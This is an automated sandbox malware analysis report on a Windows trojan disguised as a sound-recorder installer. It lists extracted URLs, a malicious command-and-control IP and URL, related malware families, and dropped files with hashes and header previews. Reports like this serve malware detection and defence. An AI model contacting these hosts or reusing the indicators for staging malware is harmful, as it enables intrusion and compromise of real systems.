                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sis-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://xml.org/sax/features/namespace-prefixesis-KI2RB.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://qtav.org2is-8ECK7.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://94.156.8.14/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f8recordpadsoundrecorder32.exe, 00000004.00000002.3269409364.0000000000969000.00000004.00000020.00020000.00000000.sdmp, recordpadsoundrecorder32.exe, 00000004.00000002.3270365274.0000000003351000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://curl.haxx.se/docs/http-cookies.htmlis-UTKLG.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tis-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crls.ssl.com/ssl.com-rsa-RootCA.crl0is-UCHQL.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.remobjects.com/psUtOniaJ21lj.exe, 00000000.00000003.2018211873.0000000002098000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000003.2017811455.0000000002310000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, tOniaJ21lj.tmp.0.dr, is-O2PKH.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0is-UCHQL.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://lame.sf.netis-VDBC5.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.thawte.com/ThawteTimestampingCA.crl0is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.thawte.com/cps0/is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.thawte.com/repository0Wis-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://qt-project.org/xml/features/report-start-end-entityis-KI2RB.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://curl.haxx.se/docs/copyright.htmlDis-UTKLG.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://curl.haxx.se/Vis-UTKLG.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.ssl.com/repository0is-UCHQL.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://trolltech.com/xml/features/report-start-end-entityis-KI2RB.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.mpegla.comtOniaJ21lj.exe, 00000000.00000003.2017542262.0000000002091000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000002.3269480886.0000000002091000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000003.2017464437.0000000002310000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000003.2022441507.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000002.3269794199.0000000002328000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000003.2019413603.0000000002328000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000003.2019304134.0000000003280000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000002.3269392528.00000000006AC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.remobjects.com/pstOniaJ21lj.exe, 00000000.00000003.2018211873.0000000002098000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000003.2017811455.0000000002310000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, tOniaJ21lj.tmp, 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, tOniaJ21lj.tmp.0.dr, is-O2PKH.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://trolltech.com/xml/features/report-whitespace-only-CharDatais-KI2RB.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0is-UCHQL.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsps.ssl.com0Qis-UCHQL.tmp.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        94.156.8.14
                        		aaxeeeo.ruBulgaria
                        		43561NET1-ASBGtrue
                        194.59.31.219
                        		unknownGermany
                        		30823COMBAHTONcombahtonGmbHDEfalse

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1455403
                        Start date and time:2024-06-11 19:41:06 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 56s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:8
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:tOniaJ21lj.exe
                        renamed because original name is a hash value
                        Original Sample Name:fa367a7d44377d2c3f684c3912fec827.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@8/49@1/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 93%
                        • Number of executed functions: 192
                        • Number of non-executed functions: 258
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: tOniaJ21lj.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        13:42:30API Interceptor532473x Sleep call for process: recordpadsoundrecorder32.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        94.156.8.14awb__document__invoice__2024__04__02__000000000000004320000000000000.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                        • 94.156.8.14/tJWrHmlMQNR240.bin
                        awb_shipping_documents_bl_01_04_2024_0000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                        • 94.156.8.14/gKMOUQth43.bin
                        194.59.31.219asaTr3exz5.exeGet hashmaliciousSocks5SystemzBrowse
                          SvctlJEZsa.exeGet hashmaliciousSocks5SystemzBrowse
                            zcpLQDujv9.exeGet hashmaliciousSocks5SystemzBrowse
                              DMRSGfYa44.exeGet hashmaliciousSocks5SystemzBrowse
                                J459EO4HX3.exeGet hashmaliciousSocks5SystemzBrowse
                                  6Xsre97JxM.exeGet hashmaliciousSocks5SystemzBrowse
                                    7grn4ITCaM.exeGet hashmaliciousSocks5SystemzBrowse
                                      UmMgwOUPt5.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                        V90FqClRNT.exeGet hashmaliciousSocks5SystemzBrowse
                                          WCvhXj4ptk.exeGet hashmaliciousSocks5SystemzBrowse

                                            Domains

                                            No context

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            COMBAHTONcombahtonGmbHDEasaTr3exz5.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 194.59.31.219
                                            SvctlJEZsa.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 194.59.31.219
                                            zcpLQDujv9.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 194.59.31.219
                                            DMRSGfYa44.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 194.59.31.219
                                            J459EO4HX3.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 194.59.31.219
                                            6Xsre97JxM.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 194.59.31.219
                                            7grn4ITCaM.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 194.59.31.219
                                            nerbianrat.binGet hashmaliciousUnknownBrowse
                                            • 45.153.240.73
                                            SKGHM_PE_757583588358839538539599593BeoersKnucklehead.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 194.59.31.187
                                            SKGHM_PE_757583588358839538539599593BeoersKnucklehead.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 194.59.31.187
                                            NET1-ASBGasaTr3exz5.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 94.156.8.14
                                            SvctlJEZsa.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 94.156.8.14
                                            zcpLQDujv9.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 94.156.8.14
                                            DMRSGfYa44.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 94.156.8.14
                                            J459EO4HX3.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 94.156.8.14
                                            Xwt4p7gzy1.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 94.156.8.14
                                            6Xsre97JxM.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 94.156.8.14
                                            UL09QPJEEX.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 94.156.8.14
                                            91fJRSNjz3.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 94.156.8.14
                                            Is2mzLKh9J.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 94.156.8.14

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Svg.dll (copy)asaTr3exz5.exeGet hashmaliciousSocks5SystemzBrowse
                                              SvctlJEZsa.exeGet hashmaliciousSocks5SystemzBrowse
                                                zcpLQDujv9.exeGet hashmaliciousSocks5SystemzBrowse
                                                  DMRSGfYa44.exeGet hashmaliciousSocks5SystemzBrowse
                                                    J459EO4HX3.exeGet hashmaliciousSocks5SystemzBrowse
                                                      Xwt4p7gzy1.exeGet hashmaliciousSocks5SystemzBrowse
                                                        6Xsre97JxM.exeGet hashmaliciousSocks5SystemzBrowse
                                                          UL09QPJEEX.exeGet hashmaliciousSocks5SystemzBrowse
                                                            91fJRSNjz3.exeGet hashmaliciousSocks5SystemzBrowse
                                                              Is2mzLKh9J.exeGet hashmaliciousSocks5SystemzBrowse
                                                                C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5OpenGL.dll (copy)asaTr3exz5.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  SvctlJEZsa.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    zcpLQDujv9.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      DMRSGfYa44.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        J459EO4HX3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                          Xwt4p7gzy1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                            6Xsre97JxM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                              UL09QPJEEX.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                91fJRSNjz3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                  Is2mzLKh9J.exeGet hashmaliciousSocks5SystemzBrowse

                                                                                    Created / dropped Files

                                                                                    C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2963553
                                                                                    Entropy (8bit):6.7944113831776685
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:v5F8VSyAJvaA5z8wbu33Lti5WGzndHKX5HCn:v5F8bAJyez8P33LtiEGzndHKX5w
                                                                                    MD5:1F7ED6F21708581170C4BF77C64A9D32
                                                                                    SHA1:B954FBF7C8A8523B7F2C101E6A7B1D852D1DBF7C
                                                                                    SHA-256:180FCC0CB50242D15ECF0DDD438C14E04A6A7B464BF0636E79620DB497A08DF7
                                                                                    SHA-512:2F62E6B4668E122C5768438E96062DFEE16E13829967F592C92DF93240908B4A09C84BBF96B6F5FBBEC2445E13FE828A0149887673A2C66E4812D0184FB9E28B
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                    Reputation:low
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^..........&...............................@..........................`-.........................................................@............................................................................................................text............................... ..`.bhead8.n*.......0..................@..@.data...xT...0...@...0..............@....rsrc................p..............@..@.chead8.........a...................a.f.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\ProgramData\uit_66.dat

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8
                                                                                    Entropy (8bit):2.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Fn:F
                                                                                    MD5:A1FCD28904D8B49B586C1CDD652FEB3D
                                                                                    SHA1:51256834CCEF8458ABD4878AF3EB40C6036A06DE
                                                                                    SHA-256:58497FEA76EE8F4C0806E365BA6E49014E85CC7845C6A6DF3F25F2F17F6E3F4A
                                                                                    SHA-512:620948F4A16BB2AC06BA93EC850279EFA286F8028F30CF8D7573659EB4F7AD19C5C2E4D0FD8263BABD75649D97D69DC6FCF65EA4E76E8DAE423E0DB584EED992
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:..hf....

                                                                                    C:\ProgramData\urc_66.dat

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):0.8112781244591328
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:lln:/
                                                                                    MD5:D0166393D140EC8994FEAB673CA2F793
                                                                                    SHA1:77FC5B8A80DAC27B46CE1B582135759BCC616474
                                                                                    SHA-256:6FEA016A651B6460FDD05E8073E5114413E814D86781E4DC4E8C3592DC851128
                                                                                    SHA-512:5BD13315AEAE9AC7FF1E52BADEE5D449F6A1AD0D61E555D994A97F4D56C97D0D4BE4F2CB4A1C186E34BBDFBA40B427CE466C5FFBBEA005F6EA7B4D3D9DBA3A61
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:8...

                                                                                    C:\ProgramData\ures-a.dat

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):128
                                                                                    Entropy (8bit):2.9545817380615236
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                                    MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                                    SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                                    SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                                    SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................

                                                                                    C:\ProgramData\ures-b.dat

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):128
                                                                                    Entropy (8bit):1.2701231977328944
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:WAmJuXDz8/:HHzc
                                                                                    MD5:0D6174E4525CFDED5DD1C9440B9DC1E7
                                                                                    SHA1:173EF30A035CE666278904625EADCFAE09233A47
                                                                                    SHA-256:458677CDF0E1A4E87D32AB67D6A5EEA9E67CB3545D79A21A0624E6BB5E1087E7
                                                                                    SHA-512:86DA96385985A1BA3D67A8676A041CA563838F474DF33D82B6ECD90C101703B30747121A6B7281E025A3C11CE28ACCEDFC94DB4E8D38E391199458056C2CD27A
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:ccddf9e705966c2f471db9..........................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5OpenGL.dll (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):320120
                                                                                    Entropy (8bit):6.398399631689542
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:bSU6+JAfisltPzYzrIybvaEezwMckNI+STEDv4nk3ad04ZqhKTrg+COv:brAltbYzsOvaWJ
                                                                                    MD5:DB19F6E0A1BB5DB1C8D87C3FE0891136
                                                                                    SHA1:3B2DAB478A8268000EF5E4474D52CB71F9EB615E
                                                                                    SHA-256:7623B596CFD989413FEA2FE355607B029EF8E64067275CBF81863688128738B0
                                                                                    SHA-512:B328DC6D1ADE3061894BC5C50F437B732190DE3CEA6D2CDC147A9A8193EE73221937FBA24209B66226D5E4B05DFFF5A79DB8B134373D1218605BCBA6EE82A6B3
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: asaTr3exz5.exe, Detection: malicious, Browse
                                                                                    • Filename: SvctlJEZsa.exe, Detection: malicious, Browse
                                                                                    • Filename: zcpLQDujv9.exe, Detection: malicious, Browse
                                                                                    • Filename: DMRSGfYa44.exe, Detection: malicious, Browse
                                                                                    • Filename: J459EO4HX3.exe, Detection: malicious, Browse
                                                                                    • Filename: Xwt4p7gzy1.exe, Detection: malicious, Browse
                                                                                    • Filename: 6Xsre97JxM.exe, Detection: malicious, Browse
                                                                                    • Filename: UL09QPJEEX.exe, Detection: malicious, Browse
                                                                                    • Filename: 91fJRSNjz3.exe, Detection: malicious, Browse
                                                                                    • Filename: Is2mzLKh9J.exe, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~@hB:!..:!..:!..3Y..2!...L..8!..aI..8!...L..,!...L..2!...L..9!...O..=!..:!..."...O../!...O..;!...O..;!..:!..;!...O..;!..Rich:!..........................PE..d....lP_.........." .....\...v......$_...................................................`..........................................5...........................,......x.......|...P...T.......................(....................p..p............................text....[.......\.................. ..`.rdata..."...p...$...`..............@..@.data...8...........................@....pdata...,..........................@..@.rsrc...............................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Svg.dll (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):331384
                                                                                    Entropy (8bit):6.387255143196498
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:cOjmvCPMfXfCsXL0hq+SNcFxkqSj1ZBtp:fcC05tp
                                                                                    MD5:C3424F2D3D26632C341EF2F542AEA36B
                                                                                    SHA1:30640EBFF046085DBA3BD0877DE8A90886BED945
                                                                                    SHA-256:FB0BD60A7D0178C62CFD14D53B40AD47E8F68DB68B95C625723CADC1CD3A1A3E
                                                                                    SHA-512:72D9A32433DA38CFB752A67C5F903F3480871FCBD16DC5999FB970313079652CF7AEB481DA6097879B641A0E76271118C6E82406DD14C9C90C7460BA6A71BDC7
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: asaTr3exz5.exe, Detection: malicious, Browse
                                                                                    • Filename: SvctlJEZsa.exe, Detection: malicious, Browse
                                                                                    • Filename: zcpLQDujv9.exe, Detection: malicious, Browse
                                                                                    • Filename: DMRSGfYa44.exe, Detection: malicious, Browse
                                                                                    • Filename: J459EO4HX3.exe, Detection: malicious, Browse
                                                                                    • Filename: Xwt4p7gzy1.exe, Detection: malicious, Browse
                                                                                    • Filename: 6Xsre97JxM.exe, Detection: malicious, Browse
                                                                                    • Filename: UL09QPJEEX.exe, Detection: malicious, Browse
                                                                                    • Filename: 91fJRSNjz3.exe, Detection: malicious, Browse
                                                                                    • Filename: Is2mzLKh9J.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........O...........8...................................W............W.....W.....W.T.....<....W.....Rich...........................PE..d...z.P_.........." .........................................................@....../.....`..................................................*....... ...........1......x....0..8....N..T...................XP..(...PO...............................................text............................... ..`.rdata.............................@..@.data...............................@....pdata...1.......2..................@..@.rsrc........ ......................@..@.reloc..8....0......................@..B........................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5WinExtras.dll (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):469624
                                                                                    Entropy (8bit):6.027128925039679
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:g814pr+wMrppkALmug7u7ozC/B4OvCH9UYHeAeBC:u9+wAkAS2j/B4BryC
                                                                                    MD5:820FFF478DC5F2C2D5F03A5DB9187FBC
                                                                                    SHA1:BD58AA8596345C837E1743617452EC7D73013F3A
                                                                                    SHA-256:3DC976E86D64881E0F37A54B5A04E903235E94D858889B1261527F0048CFBC03
                                                                                    SHA-512:1476919C5C133ACA519B9E9BE2684A85C7E669FA43942204ACDD9EC4A40577F966AD17D30A7EBD3A97A871E71178F0058966410A934822B96F0B2D7120AA43CB
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m>W.)_9.)_9.)_9. '../_9..28.+_9..2<.?_9..2=.!_9..2:.*_9.r7=.(_9.r78.%_9..18.,_9.)_8.._9..1<.&_9..19.(_9..1.(_9.)_..(_9..1;.(_9.Rich)_9.........PE..d...G.P_.........." .................................................................[....`.........................................0d...:...................p...K......x.......h....B..T...................8D..(...0C...............0...............................text...t........................... ..`.rdata.......0....... ..............@..@.data..............................@....pdata...K...p...L..................@..@.rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Xml.dll (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):213112
                                                                                    Entropy (8bit):6.331143352918189
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:V7rtKxzN2HVkkNUq3uUw8SWrBEcsGhLec956+48G+ikgyOzk1kLrTzhvt3GyY:Vr2N253eUw81rBXVevrH+mk12rTlS
                                                                                    MD5:63D91B407A350DA5CE19B5D79924B1F4
                                                                                    SHA1:45886A4018B60A5EAB7D4B743F4DF2A9A4318EDC
                                                                                    SHA-256:22B626313A535C85CE6A097571C53A6E6678A9D4BC5D0DB9F81660ADC7ED366E
                                                                                    SHA-512:FA06AB2B1AE116BC7AE93EA64D4C258A7149A23C0171C077F0919956101A22A59DD8E3F975C64073319842F01D6183253F637A0EDB514F0C02C9D88B0E65E6CF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u..j...j...j.......j.......j.. ....j.. ....j.. ....j.. ....j..i....j...j...j..i....j..i....j..i...j...j...j..i....j..Rich.j..................PE..d....kP_.........." .........,...............................................`............`..........................................t..._...........@..........t"...*..x....P.......;..T...........................`;...............................................text............................... ..`.rdata..............................@..@.data...............................@....pdata..t".......$..................@..@.rsrc........@....... ..............@..@.reloc.......P.......&..............@..B................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\QtAVWidgets1.dll (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):248680
                                                                                    Entropy (8bit):4.820760286569876
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:k6bBPHJr5r5C9Fg8Imnw5bR3Kklo7rbQox:kz
                                                                                    MD5:60BAB1D197D91828ED25099968F7D8C5
                                                                                    SHA1:FC8E1B3C2C98727D2D81A8E85420FA80EE655F19
                                                                                    SHA-256:F682B5AA0AF3CEE93F890EC6717F94C1AC9B75EBFF512955C6531E7CEE05D196
                                                                                    SHA-512:5B9CBB11E3FCB00FD76F595520DA4610FA37B0F1227D016D77350909846BA33AF9A32B650BB1CE9A73549DB5BF190C2205E28223D1745191B2424F6DC7327B38
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........e..6..6..6..`6..6...7..6...7..6...7..6...7..62..7..6J..7..62..7..6l..7..6..6...6l..7..6l..7..6l..6..6.d6..6l..7..6Rich..6........................PE..d...3N2c.........." ................................................................U....`..........................................&...0..(W..,.... ..................h!..............T...........................`...8............................................text...+........................... ..`.rdata..v'.......(..................@..@.data...x%....... ..................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\avdevice-58.dll (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):135016
                                                                                    Entropy (8bit):5.674566205873397
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:GZU6fX6Kj693r/67BhRpsGmQhRJRVW8/mpI4Sx8K5aqEkmgcs8MYQJaqEkmgcs8o:GZU6qz3ERpNzhRvVoVDe1r0+
